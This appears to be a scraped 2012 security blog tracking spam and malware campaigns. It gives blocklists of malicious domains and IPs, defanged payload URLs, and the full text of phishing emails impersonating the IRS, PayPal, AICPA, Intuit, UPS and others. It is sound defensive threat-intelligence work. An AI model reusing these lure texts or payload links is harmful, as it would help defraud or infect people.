The following domains appear to be part of an ongoing injection attack (using lasimp04risoned.rr.nu at present). They are hosted by black-hat web host Specialist ISP in Transnistria. Block the IP range of 194.28.112.0 - 194.28.115.255 (194.28.112.0/22) is a very good idea as this is one of the worst netblocks I know of.
aelis30greek.rr.nu
aff29ili.rr.nu
aljo73hnsto.rr.nu
ambers00supplem.rr.nu
ano98the.rr.nu
appoin62tmentba.rr.nu
asciia28rmcover.rr.nu
ati92oni.rr.nu
ation82gamma.rr.nu
avia83resou.rr.nu
bear37sall.rr.nu
bitr07aryc.rr.nu
bles41steve.rr.nu
carrie01rskans.rr.nu
che59mica.rr.nu
chn34olo.rr.nu
comme17rcial.rr.nu
cons63isten.rr.nu
cos69tbu.rr.nu
cov59erm.rr.nu
cthu85srisc.rr.nu
ctsc60anli.rr.nu
eates01publi.rr.nu
ection18depres.rr.nu
elew72isst.rr.nu
enedm79ultina.rr.nu
enegat43ivecon.rr.nu
engag75edfol.rr.nu
enge75sfra.rr.nu
enormousw1illa.com
ens122zzzddazz.com
entio21nsamba.rr.nu
esgen48erally.rr.nu
eside00ntwin.rr.nu
fee89edi.rr.nu
gra98desi.rr.nu
hitam41ultime.rr.nu
hoperjoper.ru
iab35ilit.rr.nu
ialac93idcod.rr.nu
icans11deskto.rr.nu
ident08winner.rr.nu
impo82rtse.rr.nu
int99onin.rr.nu
ion68you.rr.nu
ited51pala.rr.nu
ive23lit.rr.nu
kpo82stp.rr.nu
lasimp04risoned.rr.nu
lighte93dnickel.rr.nu
limina94tedefi.rr.nu
mainglobilisi.com
mals30ynta.rr.nu
mpa89qaut.rr.nu
mtube-ssl.com
ncomp97aredli.rr.nu
neou44slypa.rr.nu
ngsin45dividu.rr.nu
nstitu42tional.rr.nu
nting91uncle.rr.nu
nusi60ngmus.rr.nu
ocat47edha.rr.nu
ocum04entat.rr.nu
oneflo30orcall.rr.nu
onsco10mdexpo.rr.nu
ort26ibm.rr.nu
ort53hori.rr.nu
ovie26tther.rr.nu
pxm-tube.com
qtr49exis.rr.nu
raff60icke.rr.nu
rlyspa21rcleona.rr.nu
rsm95ario.rr.nu
scue08doral.rr.nu
selle33rsjunk.rr.nu
sicb79enef.rr.nu
sor52tium.rr.nu
ssic2061thligh.rr.nu
ssmo24king.rr.nu
sweepstakesandcontestsdo.com
sweepstakesandcontestsinfo.com
syno98nepet.rr.nu
takeo46versav.rr.nu
tanswe24ringni.rr.nu
tarts63exten.rr.nu
timel08arges.rr.nu
tiona82lclos.rr.nu
tormco48nstitu.rr.nu
tssign51stechno.rr.nu
vada86subje.rr.nu
velit30eratu.rr.nu
viv17eddr.rr.nu
whyi70splay.rr.nu
yint60eres.rr.nu
ysoci94alspec.rr.nu
zbol42lahg.rr.nu
Tuesday, 31 July 2012
Something evil on 194.28.115.150 and lasimp04risoned.rr.nu
Labels:
Evil Network,
Malware,
Moldova,
Specialist ISP,
Transnistria,
Viruses
Friday, 27 July 2012
Malware on online-gaminatore.ru
89.111.177.151
203.80.16.81
78.83.233.242
These IPs have been used several times recently and should be blocked.
Thursday, 26 July 2012
"Federal Tax transfer" spam / retweetadministrator.org
Date: Thu, 26 Jul 2012 20:56:10 +0530
From: "Internal Revenue Service" [alerts@irs.gov]
Subject: Federal Tax transfer returned
Your federal Tax payment (ID: 632004160993), recently from your checking account was rejected by the your financial institution.
Canceled Tax transfer
Tax Transaction ID: 632004160993
Rejection Reason See details in the report below
Tax Transaction Report tax_report_632004160993.doc (Microsoft Word Document)
Internal Revenue Service, Metro Plex 1, 8401 Corporate Drive, Suite 300, Landover, MD 20785
==========
Date: Thu, 26 Jul 2012 20:55:41 +0530
From: "Internal Revenue Service" [support@irs.gov]
Subject: Rejected Federal Tax transaction
Your Tax payment (ID: 766644379032), recently initiated from your checking account was rejected by the your financial institution.
Rejected Tax transfer
Tax Transaction ID: 766644379032
Reason of rejection See details in the report below
FederalTax Transaction Report tax_report_766644379032.doc (Microsoft Word Document)
Internal Revenue Service, Metro Plex 1, 8401 Corporate Drive, Suite 300, Landover, MD 20785
==========
Date: Thu, 26 Jul 2012 12:00:54 -0300
From: "Internal Revenue Service" [support@irs.gov]
Subject: Rejected Federal Tax transfer
Your federal Tax payment (ID: 776394251906), recently from your checking account was returned by the your financial institution.
Canceled Tax transfer
Tax Transaction ID: 776394251906
Reason of rejection See details in the report below
FederalTax Transaction Report tax_report_776394251906.doc (Microsoft Word Document)
Internal Revenue Service, Metro Plex 1, 8401 Corporate Drive, Suite 300, Landover, MD 20785
The malicious payload is on [donotclick]retweetadministrator.org/main.php?page=8b45f871830c6e5a (report here) hosted on 89.253.231.202 (Rusonyx Ltd, Moscow).
"Adobe CS4 License" spam / online-gaminatore.ru
Date: Thu, 26 Jul 2012 09:24:01 +0900
From: FentonpJsGh9LIsiah@aol.com
Subject: Order N81149
Dear Sirs,
You can download your Adobe CS4 License here -
We encourage you to explore its new and enhanced capabilities with these helpful tips, tutorials, and eSeminars.
Thank you for buying Adobe InDesign CS4 software.
Adobe Systems Incorporated
The malicious payload is at [donotclick]online-gaminatore.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c (report here) hosted on the following IPs:
89.111.177.151 (Garant-Park-Telecom, Russia)
78.83.233.242 (Spectrum Net JSC, Bulgaria)
These IPs should be blocked if you can.
Wednesday, 25 July 2012
"Wire Transfer" spam / furnitura-forums.ru
This fake "Wire Transfer" spam (or is it UPS?) leads to malware on furnitura-forums.ru:
The attachment Wire_ID88283.htm attempts to load malware from [donotclick]furnitura-forums.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c (report here) hosted on the following IPs:
78.83.233.242 (Spectrum Net JSC, Bulgaria)
203.80.16.81 (Myren, Malaysia)
..these two IP addresses also host some other malware sites and are worth blocking:
porschedesignrussia.ru
bmwforummsk.ru
phpforkiddies.ru
forumanarhist.ru
Date: Wed, 25 Jul 2012 09:12:43 -0500
From: "Express MyUps" [upsservices@ups.com]
Subject: Fwd: Re: Wire Transfer
Attachments: Wire_ID88283.htm
Dear Operator,
WIRE FID: NO-004394626739460
STATUS: CANCELLED
You can find details in the attached file.
The attachment Wire_ID88283.htm attempts to load malware from [donotclick]furnitura-forums.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c (report here) hosted on the following IPs:
78.83.233.242 (Spectrum Net JSC, Bulgaria)
203.80.16.81 (Myren, Malaysia)
..these two IP addresses also host some other malware sites and are worth blocking:
porschedesignrussia.ru
bmwforummsk.ru
phpforkiddies.ru
forumanarhist.ru
US Airways spam / reformattedfilmmaker.org and algebrayep.org
This fake US Airways spam leads to malware on reformattedfilmmaker.org:
The malicious payload is at [dotnotclick]reformattedfilmmaker.org/main.php?page=70ec803a01c84ddc (report here) hosted on the same Chinese IP address of 221.131.129.200 that was used in a similar spam run yesterday.
UPDATE: a similar US Airways spam run is also underway with a malicious payload on algebrayep.org on the same IP address.
Date: Wed, 25 Jul 2012 09:46:57 -0500
From: "US Airways - Reservations" [support@myusairways.com]
Subject: Confirm your US airways online reservation.
You should check in from 24 hours and up to 60 minutes before your flight (2 hours if you're flying abroad). After that, all you have to do is print your boarding pass and go to the gate.
Confirmation code: 210916
Check-in online: Online reservation details
Flight
4817
Departure city and time
Washington, DC (DCA) 10:00PM
Depart date: 7/26/2012
We are committed to protecting your privacy. Your information is kept private and confidential. For information about our privacy policy visit usairways.com.
US Airways, 111 W. Rio Salado Pkwy, Tempe, AZ 85281 , Copyright US Airways , All rights reserved.
The malicious payload is at [dotnotclick]reformattedfilmmaker.org/main.php?page=70ec803a01c84ddc (report here) hosted on the same Chinese IP address of 221.131.129.200 that was used in a similar spam run yesterday.
UPDATE: a similar US Airways spam run is also underway with a malicious payload on algebrayep.org on the same IP address.
Labels:
Amerika,
Malware,
Spam,
US Airways,
Viruses
Tuesday, 24 July 2012
PayPal Spam / teloexpressions.org
Date: Tue, 24 Jul 2012 18:06:49 +0330
From: "Allan Marquez" <notify@paypal.com>
Subject: Paypal has sent you a bank transfer.
<tr =="" valign="top">
<table =="" border="0" cellpadding="0" cellspacing="0" width="100%">
We are moving funds from Your Paypal account to your bank account.
Total amount transferred $ 131.54
Bank account BANK OF AMERICA
Transaction ID 59566237893344612
<div style="text-align: center;" class="footerLinks" 5px="" 0;="" padding:="">Help Center Resolution Center Security Center
Please don't reply to this email. It'll just confuse the computer that sent it and you won't get a response.
Copyright 2012 PayPal, Inc. All rights reserved. PayPal is located at 2211 N. First St., San Jose, CA 95131.
==========
Date: Tue, 24 Jul 2012 11:33:00 -0300
From: "Jody Wade" <notify@paypal.com>
Subject: Paypal transfer to your bank account initiated.
<tr =="" valign="top">
<table =="" border="0" cellpadding="0" cellspacing="0" width="100%">
We are transferring funds from Your Paypal account to your bank account.
Total amount transferred $ 944.68
Bank account BANK OF NORTH CAROLINA
Transaction ID 67081555155766933
<div style="text-align: center;" class="footerLinks" 5px="" 0;="" padding:="">Help Center Resolution Center Security Center
Please don't reply to this email. It'll just confuse the computer that sent it and you won't get a response.
Copyright 2012 PayPal, Inc. All rights reserved. PayPal is located at 2211 N. First St., San Jose, CA 95131.
==========
Date: Tue, 24 Jul 2012 11:10:58 -0300
From: "Evan Battle" <notify@paypal.com>
Subject: We have sent you a bank transfer.
<tr =="" valign="top">
<table =="" border="0" cellpadding="0" cellspacing="0" width="100%">
We are sending funds from Paypal to your bank account.
Total amount transferred $ 123.59
Bank account CITYBANK
Transaction ID 55273357044211327
<div style="text-align: center;" class="footerLinks" 5px="" 0;="" padding:="">Help Center Resolution Center Security Center
Please don't reply to this email. It'll just confuse the computer that sent it and you won't get a response.
Copyright 2012 PayPal, Inc. All rights reserved. PayPal is located at 2211 N. First St., San Jose, CA 95131.
==========
Date: Tue, 24 Jul 2012 19:15:46 +0530
From: "service@paypal.com" <service@paypal.com>
Subject: Paypal transfer to your bank account initiated.
<tr =="" valign="top">
<table =="" border="0" cellpadding="0" cellspacing="0" width="100%">
We are moving funds from Paypal to your bank account.
Total amount transferred $ 425.21
Bank account BANK OF NORTH CAROLINA
Transaction ID 17744199446279262
<div style="text-align: center;" class="footerLinks" 5px="" 0;="" padding:="">Help Center Resolution Center Security Center
Please don't reply to this email. It'll just confuse the computer that sent it and you won't get a response.
Copyright 2012 PayPal, Inc. All rights reserved. PayPal is located at 2211 N. First St., San Jose, CA 95131.
==========
Date: Tue, 24 Jul 2012 09:45:45 -0400
From: "service@paypal.com" <service@paypal.com>
Subject: Paypal has sent you a bank transfer.
<tr =="" valign="top">
<table =="" border="0" cellpadding="0" cellspacing="0" width="100%">
We are moving funds from Your Paypal account to your bank account.
Total amount transferred $ 191.22
Bank account CITYBANK
Transaction ID 64722827521858421
<div style="text-align: center;" class="footerLinks" 5px="" 0;="" padding:="">Help Center Resolution Center Security Center
Please don't reply to this email. It'll just confuse the computer that sent it and you won't get a response.
Copyright 2012 PayPal, Inc. All rights reserved. PayPal is located at 2211 N. First St., San Jose, CA 95131.
The malicious payload is at [donotclick]teloexpressions.org/main.php?page=9aca5bbc34d3ebd6 (report here) hosted on 221.131.129.200 which we have seen before and is definitely worth blocking.
Monday, 23 July 2012
"Hi, we think you may be entitled to compensation.." SMS spam
The PPI claim spammers are back again, this time using the throwaway number of +447969662555
If you get one of these, you should forward the spam and the sender's number to your carrier. In the came of T-Mobile, O2 and Orange the number to report to is 7726 ("SPAM"). Vodafone customers should use 87726 ("VSPAM") and Three customers should use 37726 ("3SPAM"). Hopefully the carriers will act if there are enough complaints.
Obviously they think nothing of the sort and are just randomly spamming, even to mobile phone numbers registered with TPS. Given that their pitch is based on a lie, it's likely that the whole outfit it some sort of scam in any case.Hi, we think you may be entitled to compensation of up to £3500 from missold PPI on a credit card or loan.
Reply PPI for more info
Reply STOP to opt out
If you get one of these, you should forward the spam and the sender's number to your carrier. In the came of T-Mobile, O2 and Orange the number to report to is 7726 ("SPAM"). Vodafone customers should use 87726 ("VSPAM") and Three customers should use 37726 ("3SPAM"). Hopefully the carriers will act if there are enough complaints.
Friday, 20 July 2012
Wire Transfer spam / porschedesignrussia.ru
Date: Fri, 20 Jul 2012 04:10:52 +0100
Subject: RE: Your Wire Transfer N02526593
Good morning,
Wire debit transfer was canceled by the other financial institution.
Canceled transfer:
FED REFERENCE NUMBER: ISL9653367088ODP06829K
Transfer Report: View
Federal Reserve Wire Network
The malicious payload is at [donotclick]porschedesignrussia.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c (report here) hosted on the following IPs:
78.83.233.242
203.80.16.81
213.17.171.186
These are the same IP addresses as used in this attack from yesterday. Blocking them would probably be prudent.
Labels:
Malvertising,
RU:8080,
Spam,
Viruses
Thursday, 19 July 2012
AICPA spam / jeffknitwear.org
I haven't seen this fake AICPA spam for a while, but here it is.. this time leading to a malicious payload on the domain jeffknitwear.org:
The malicious payload is at [donotclick]jeffknitwear.org/main.php?page=8614d3f3a69b5162 (report here) hosted on 221.131.129.200 (China Mobile, China). The following domains are on the same server and you should either block the IP or these domains too:
checkingservices.net
historyalmostany.org
jeffknitwear.org
lefttorightproductservice.org
toeplunge.org
yourfirstwall.com
visorwordprocessor.org
Date: Thu, 19 Jul 2012 17:03:06 +0300
From: "Lakisha Rush" [support@aicpa.org]
Subject: Termination of your accountant license.
You're receiving this notification as a Certified Public Accountant and a member of AICPA.
Having trouble reading this email? View it in your browser.
Cancellation of Accountant status due to income tax fraud allegations
Dear AICPA member,
We have received a complaint about your possible participation in income tax refund fraudulent activity for one of your clients. According to AICPA Bylaw Paragraph 730 your Certified Public Accountant license can be withdrawn in case of the fact of filing of a misguided or fraudulent tax return for your client or employer.
Please be informed of the complaint below and respond to it within 7 days. The failure to respond within this term will result in cancellation of your CPA license.
Complaint.pdf
The American Institute of Certified Public Accountants.
Email: service@aicpa.org
Tel. 888.777.7077
Fax. 800.362.5066
==========
Date: Thu, 19 Jul 2012 14:02:48 +0000
From: "Jonathan Gallagher" [support@aicpa.org]
Subject: Fraudulent tax return assistance accusations.
You're receiving this email as a Certified Public Accountant and a member of AICPA.
Having trouble reading this email? View it in your browser.
Cancellation of Accountant status due to income tax fraud allegations
Dear accountant officer,
We have been notified of your possible involvement in tax return fraudulent activity for one of your employees. According to AICPA Bylaw Paragraph 730 your Certified Public Accountant license can be cancelled in case of the occurrence of presenting of a misguided or fraudulent income tax return on the member's or a client's behalf.
Please familiarize yourself with the notification below and respond to it within 14 days. The failure to provide the clarifications within this time-frame will result in termination of your Accountant status.
Complaint.pdf
The American Institute of Certified Public Accountants.
Email: service@aicpa.org
Tel. 888.777.7077
Fax. 800.362.5066
The malicious payload is at [donotclick]jeffknitwear.org/main.php?page=8614d3f3a69b5162 (report here) hosted on 221.131.129.200 (China Mobile, China). The following domains are on the same server and you should either block the IP or these domains too:
checkingservices.net
historyalmostany.org
jeffknitwear.org
lefttorightproductservice.org
toeplunge.org
yourfirstwall.com
visorwordprocessor.org
"Fwd: Wire Transfer (9579GQ518) " spam / forumanarhist.ru
Date: Thu, 19 Jul 2012 02:56:36 -0400
From: CABALLEROFANNYcRU@aol.com
Subject: Fwd: Wire Transfer (9579GQ518)
Attachments: Wire_AMBA01-Rejected.htm
Dear Operator,
WIRE N: FD-1059598546520289
STATUS: REJECTED
You can find details in the attached file.
The malicious attachment is named Wire_AMBA01-Rejected.htm and contains a redirector to [donotclick]forumanarhist.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c (report here)
That site is multhomed at the following IPs:
78.83.233.242
203.80.16.81
213.17.171.186
There are some additional IPs and domains that can be found in this post that should also be blocked.
"Wire Transfer" spam / phpforkiddies.ru
Date: Wed, 18 Jul 2012 01:23:20 +0300The attachment in this case is called Wire_NFED_Rejected.htm and contains a script that attempts to load malware from [donotclick]phpforkiddies.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c (report here) which is multihomed on the following IPs:
From: "EUNA Wood" [AdamWnukowski@himsa.com.mx]
Subject: Fwd: Wire Transfer (75073UQ608)
Attachments: Wire_NFED_Rejected.htm
Dear Operator,
WIRE N: FED-9058663000926019
STATUS: REJECTED
You can find details in the attached file.
The following IPs and domains are connected and should be blocked:
41.66.137.155
50.57.43.49
62.76.186.75
62.76.188.120
62.213.64.161
78.83.233.242
85.143.166.243
87.120.41.155
89.111.177.151
173.203.96.79
184.106.189.124
193.109.144.51
203.80.16.81
203.172.140.202
213.17.171.186
bmwforummsk.ru
forumenginesspb.ru
hamlovladivostok.ru
mazdaontours.ru
phpforkiddies.ru
porscheforumspb.ru
Tuesday, 17 July 2012
Fake Craigslist emails / visorwordprocessor.org
These fake Craigslist emails lead to malware on visorwordprocessor.org:
The malicious payload is at [donotclick]visorwordprocessor.org/main.php?page=ed0a25d616022c57 (report here) hosted on 91.227.18.26 (Eximus LLC, Russia). The namesevers are at good-autosport.com which links this attack in with this one earlier today.
Date: Tue, 17 Jul 2012 09:01:11 -0500
From: "craigslist - automated message, do not reply" [robot@craigslist.org]
Subject: Your Craiglist.org posting URL.
Posting ID # 27643127:
"Double Stainless Steel Sink" (household items - by owner)
Should now be accessible at the following URL:
http://craigslist.org/hsh/262383.html
Index pages and search results are updated every 15 minutes.
To edit or delete, please log in to your member area.
If you are having trouble finding your posting in the listings:
http://www.craigslist.org/about/help/how_to_fi= nd_your_post_in_the_listings
For other questions or help:
http://w= ww.craigslist.org/about/help/
Safety tips and avoiding scams:
http://= www.craigslist.org/about/safety
http://www.craigslist.o= rg/about/scams
Thanks for using craigslist!
==========
Date: Tue, 17 Jul 2012 06:00:52 -0800
From: "craigslist - automated message, do not reply" [robot@craigslist.org]
Subject: Your Craiglist posting is successful.
Posting ID # 14717917:
"Turbo 400 Tranny" (household items - by owner)
Should now be accessible at the following URL:
http://craigslist.org/hsh/888725.html
New postings are updated every 15 minutes.
To edit or delete, please log in to your member area.
If you are having trouble finding your item in the listings:
http://www.craigslist.org/about/help/how_to_fi= nd_your_post_in_the_listings
For other questions or help:
http://w= ww.craigslist.org/about/help/
Safety tips and avoiding scams:
http://= www.craigslist.org/about/safety
http://www.craigslist.o= rg/about/scams
Thanks for using craigslist!
==========
Date: Tue, 17 Jul 2012 15:13:26 +0200
From: "craigslist - automated message, do not reply" [robot@craigslist.org]
Subject: Your Craiglist posting is successful.
Posting ID # 49685217:
"Generator" (household items - by owner)
Should now be viewable at the following URL:
http://craigslist.org/hsh/887563.html
New postings are updated every 15 minutes.
To edit or delete, please log in to your account.
If you are experiencing problems finding your posting in the listings:
http://www.craigslist.org/about/help/how_to_fi= nd_your_post_in_the_listings
For other questions or help:
http://w= ww.craigslist.org/about/help/
Safety tips and avoiding scams:
http://= www.craigslist.org/about/safety
http://www.craigslist.o= rg/about/scams
Thanks for using craigslist!
==========
Date: Tue, 17 Jul 2012 10:09:15 -0300
From: "craigslist - automated message, do not reply" [robot@craigslist.org]
Subject: You can access your Craiglist listing by the new location.
Posting ID # 35649793:
"Screwdrivers kit" (household items - by owner)
Can now be viewable at the following location:
http://craigslist.org/hsh/284761.html
Index pages and search results are updated every 15 minutes.
To edit or delete, please log in to your account.
If you are having trouble finding your item in the listings:
http://www.craigslist.org/about/help/how_to_fi= nd_your_post_in_the_listings
For other questions or help:
http://w= ww.craigslist.org/about/help/
Safety tips and avoiding scams:
http://= www.craigslist.org/about/safety
http://www.craigslist.o= rg/about/scams
Thanks for using craigslist!
The malicious payload is at [donotclick]visorwordprocessor.org/main.php?page=ed0a25d616022c57 (report here) hosted on 91.227.18.26 (Eximus LLC, Russia). The namesevers are at good-autosport.com which links this attack in with this one earlier today.
Intuit "Henderson LLC" payment spam / mailmergesfinger.org
This fake Intuit spam leads to malware on mailmergesfinger.org:
The malicious payload is at [donotclick]mailmergesfinger.org/main.php?page=bfc8be54a0120bca (report here) hosted on 94.249.172.71 (GHOSTnet, Germany).
The following IPs and domains are connected and should be avoided or blocked:
13.65.99.23
46.20.33.131
62.109.26.35
78.129.132.14
80.77.87.185
94.249.172.71
108.76.72.229
109.164.221.176
164.15.250.148
195.54.32.91
198.144.189.51
200.184.213.131
211.157.105.160
afriget.net
cms-wideopendns.com
fonografs.net
good-autosport.com
mailmergesfinger.org
peace-computer.com
proamd-inc.com
thaidescribed.com
Date: Mon, 16 Jul 2012 18:10:26 +0000
From: "Intuit PaymentNetwork" [support@intuit.com]
Subject: You have received a new payment through the Intuit network.
Payment received: You received $280.00 from Henderson LLC for invoice 91816
You can access the payment details here.
Funds will be deposited in your bank account.
You now have the possibility to get paid by Credit Card on your invoices. To find put more please sign in to your IPN account and click on the 'Profile' tab on the left.
The malicious payload is at [donotclick]mailmergesfinger.org/main.php?page=bfc8be54a0120bca (report here) hosted on 94.249.172.71 (GHOSTnet, Germany).
The following IPs and domains are connected and should be avoided or blocked:
13.65.99.23
46.20.33.131
62.109.26.35
78.129.132.14
80.77.87.185
94.249.172.71
108.76.72.229
109.164.221.176
164.15.250.148
195.54.32.91
198.144.189.51
200.184.213.131
211.157.105.160
afriget.net
cms-wideopendns.com
fonografs.net
good-autosport.com
mailmergesfinger.org
peace-computer.com
proamd-inc.com
thaidescribed.com
Monday, 16 July 2012
"Intuit Payroll Services" spam / cms-wideopendns.com
These (rather confused) spam emails lead to malware on cms-wideopendns.com:
LinkedIn? Intuit? The bad guys are confused, but these are dangerous emails nonetheless. The malicious payload is at [donotclick]cms-wideopendns.com/main.php?page=bfc8be54a0120bca (report here) hosted on the following IPs:
211.157.105.160 (Chinacomm, China)
109.164.221.176 (Swisscom, Switzerland)
The following IPs and domains are all connected and should be blocked:
46.20.33.131
62.109.26.35
80.77.87.185
108.76.72.229
109.164.221.176
164.15.250.148
195.54.32.91
198.144.189.51
211.157.105.160
afriget.net
cms-wideopendns.com
fonografs.net
peace-computer.com
proamd-inc.com
thaidescribed.com
From: LinkedIn Communication [mailto:support@intuit.com]
Sent: 16 July 2012 15:12
Subject: We have received your payroll processing request.
Direct Deposit Service Communication
Status update
Dear victim
We received your payroll on July 16, 2012 at 1:16 AM Pacific Time.
• Funds will be withdrawn from the bank account number ending in: XXXX on July 17, 2012.
• Amount to be withdrawn: $2,476.11
• Paychecks will be deposited to your employees' accounts on: July 17, 2012
• Please download your payroll here.
Funds are as a rule processed before normal banking hours so please make sure you have sufficient funds available by 12 a.m. on the date funds are to be withdrawn.
Intuit must receive your payroll by 5 p.m. Pacific time, two banking days before your payment date or your employees will fail to be paid on time. QuickBooks does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be downloaded at the Federal Reserve website.
Thank you for your business.
Sincerely,
Intuit Payroll Services
IMPORTANT NOTICE: This notification is being sent to inform you of a critical matter concerning your current service or software. Please note that if you previously opted out of receiving marketing materials from Intuit, you may continue to receive notifications similar to this communication that affect your service or software.
If you have any questions or comments about this email, please DO NOT REPLY to this email. If you need additional information please contact us.
If you receive an email message that appears to come from Intuit but that you suspect is a phishing email, please forward it to immediately to spoof@intuit.com.
Copyright 2008 Intuit Inc. QuickBooks and Intuit are registered trademarks of and/or registered service marks of Intuit Inc. in the United States and other countries. This notification is not intended to supplement, modify, or extend the Intuit software license agreement between you and Intuit for any Intuit product or service.
Intuit Inc. Customer Communications
2800 E. Commerce Center Place, Tucson, AZ 85706
====================
From: LinkedIn Communication [support@intuit.com]
Sent: Mon 16/07/2012 15:12
Subject: Your payroll processing is initiated by Intuit.
Direct Deposit Service Communication
Status update
Dear victim
We obtained your payroll on July 16, 2012 at 7:36 AM Pacific Time.
• Funds will be withdrawn from the bank account number ending in: XXXX on July 17, 2012.
• Amount to be withdrawn: $5,582.11
• Paychecks will be deposited to your employees' accounts on: July 17, 2012
• Please download your payroll here.
Funds are typically withdrawn before normal banking hours so please make sure you have sufficient funds available by 12 a.m. on the date funds are to be withdrawn.
Intuit must receive your payroll by 5 p.m. Pacific time, two banking days before your payment date or your employees will fail to be paid on time. QuickBooks does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be downloaded at the Federal Reserve website.
Thank you for your business.
Sincerely,
Intuit Payroll Services
IMPORTANT NOTICE: This notification is being sent to inform you of a critical matter concerning your current service or software. Please note that if you previously opted out of receiving marketing materials from Intuit, you may continue to receive notifications similar to this communication that affect your service or software.
If you have any questions or comments about this email, please DO NOT REPLY to this email. If you need additional information please contact us.
If you receive an email message that appears to come from Intuit but that you suspect is a phishing email, please forward it to immediately to spoof@intuit.com.
Copyright 2008 Intuit Inc. QuickBooks and Intuit are registered trademarks of and/or registered service marks of Intuit Inc. in the United States and other countries. This notification is not intended to supplement, modify, or extend the Intuit software license agreement between you and Intuit for any Intuit product or service.
Intuit Inc. Customer Communications
2800 E. Commerce Center Place, Tucson, AZ 85706
LinkedIn? Intuit? The bad guys are confused, but these are dangerous emails nonetheless. The malicious payload is at [donotclick]cms-wideopendns.com/main.php?page=bfc8be54a0120bca (report here) hosted on the following IPs:
211.157.105.160 (Chinacomm, China)
109.164.221.176 (Swisscom, Switzerland)
The following IPs and domains are all connected and should be blocked:
46.20.33.131
62.109.26.35
80.77.87.185
108.76.72.229
109.164.221.176
164.15.250.148
195.54.32.91
198.144.189.51
211.157.105.160
afriget.net
cms-wideopendns.com
fonografs.net
peace-computer.com
proamd-inc.com
thaidescribed.com
Sunday, 15 July 2012
Facebook "Error message [404] 404 Not Found" email messages
This one has me scratching my head.. a series of emails this morning with subjects similar to the following:
Error message [404] 404 Not Found for m.facebook.com/media/set/?set=a.[redacted].8100.100000762125833
Error message [404] 404 Not Found for m.facebook.com/pokes/?refid=7
Error message [404] 404 Not Found for m.facebook.com/home.php?sk=photodash
The emails appear to originate from a Yahoo! IP address, the sender's email address matches a registered Facebook account and in one case the URL in the subject links to a gallery from the same user. But I don't know who these people are, and the email address sent to is a rarely used one that has NEVER been used for Facebook.
In most cases the email is blank, in one case there is a photograph of a BlackBerry, apparently taken yesterday from a Samsung GT-C6625 (an oldish Windows Mobile device). The IP headers indicate that this is maybe coming through a mobile version of Yahoo! mail. An infected mobile phone perhaps?
It's all kind of odd, perhaps it is the precursor to something else?
Error message [404] 404 Not Found for m.facebook.com/media/set/?set=a.[redacted].8100.100000762125833
Error message [404] 404 Not Found for m.facebook.com/pokes/?refid=7
Error message [404] 404 Not Found for m.facebook.com/home.php?sk=photodash
The emails appear to originate from a Yahoo! IP address, the sender's email address matches a registered Facebook account and in one case the URL in the subject links to a gallery from the same user. But I don't know who these people are, and the email address sent to is a rarely used one that has NEVER been used for Facebook.
In most cases the email is blank, in one case there is a photograph of a BlackBerry, apparently taken yesterday from a Samsung GT-C6625 (an oldish Windows Mobile device). The IP headers indicate that this is maybe coming through a mobile version of Yahoo! mail. An infected mobile phone perhaps?
It's all kind of odd, perhaps it is the precursor to something else?
Wednesday, 11 July 2012
UPS Spam / peace-computer.com
This fake UPS spam leads to malware on peace-computer.com:
The malicious payload is at [donotclick]peace-computer.com/main.php?page=22b33afad06e9ba5
on 62.109.26.35 (ISPsystem, Russia). The following domains and IPs are all connected to this attack:
afriget.net
ecocabmedia.net
fonografs.net
ghanarpower.net
hotspotboutique.net
itleadgenie.net
lessthansmoothmasculine.com
nectarstuff.net
sitkatacotruck.com
speciallyregarding.com
thaidescribed.com
yourcheckservice.com
46.105.254.202
62.109.26.35
92.201.139.15
109.164.221.176
109.169.87.169
158.25.100.139
164.15.250.148
173.234.9.84
209.59.210.119
211.157.105.160
Date: Wed, 11 Jul 2012 09:51:41 -0500
From: "Margret Bellamy" [USPS_Shipping_Services@usps.com]
Subject: Download your UPS invoices.
This is an automatically generated email Please do not reply to this email address.
Dear UPS Customer,
New invoice(invoices) are available for viewing in UPS billing center. Please note that your UPS invoices should be paid within 14 days to avoid any additional charges.
Please visit the UPS Billing Center to view and pay your invoice.
Find out more about UPS:
Visit ups.com
Explore UPS Freight Services
Learn About UPS Companies
Sign Up For Additional Email From UPS
Read our official journal
(c) 2012 United Parcel Service of America, Inc. UPS, the UPS brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
For more information on UPS's privacy practices, refer to the UPS Privacy Policy.
Please do not reply directly to this e-mail. UPS will not receive any reply message.
For questions or comments, visit Contact UPS.
This communication contains proprietary information and may be confidential. If you are not the intended recipient, the reading, copying, disclosure or other use of the contents of this e-mail is strictly prohibited and you are instructed to please delete this e-mail immediately.
Privacy Policy
Contact UPS
The malicious payload is at [donotclick]peace-computer.com/main.php?page=22b33afad06e9ba5
on 62.109.26.35 (ISPsystem, Russia). The following domains and IPs are all connected to this attack:
afriget.net
ecocabmedia.net
fonografs.net
ghanarpower.net
hotspotboutique.net
itleadgenie.net
lessthansmoothmasculine.com
nectarstuff.net
sitkatacotruck.com
speciallyregarding.com
thaidescribed.com
yourcheckservice.com
46.105.254.202
62.109.26.35
92.201.139.15
109.164.221.176
109.169.87.169
158.25.100.139
164.15.250.148
173.234.9.84
209.59.210.119
211.157.105.160
Spam: Your Amazon.com order of "GoPro HD Helmet HERO Camcorder - Silver" has shipped!
Sent: 11 July 2012 15:12
Subject: Your Amazon.com order of "GoPro HD Helmet HERO Camcorder - Silver" has shipped!
Hello,
Shipping Confirmation
Order # 111-8744380-4899254
Your estimated delivery date is:
Friday, July 13 2012
Track your package Thank you for shopping with us. We thought you'd like to know that we shipped this portion of your order separately to give you quicker service. You won't be charged any extra shipping fees, and the remainder of your order will follow as soon as those items become available. If you need to return an item from this shipment or manage other orders, please visit Your Orders on Amazon.com.
Shipment Details
GoPro HD Helmet HERO Camcorder - Silver $149.95
Item Subtotal: $149.95
Shipping & Handling: $0.00
Total Before Tax: $149.95
Shipment Total: $149.95
Paid by Visa: $149.95
You have only been charged for the items sent in this shipment. Per our policy, you only pay for items when we ship them to you.
Returns are easy. Visit our .
If you need further assistance with your order, please visit Customer Service.
We hope to see you again soon!
Amazon.com
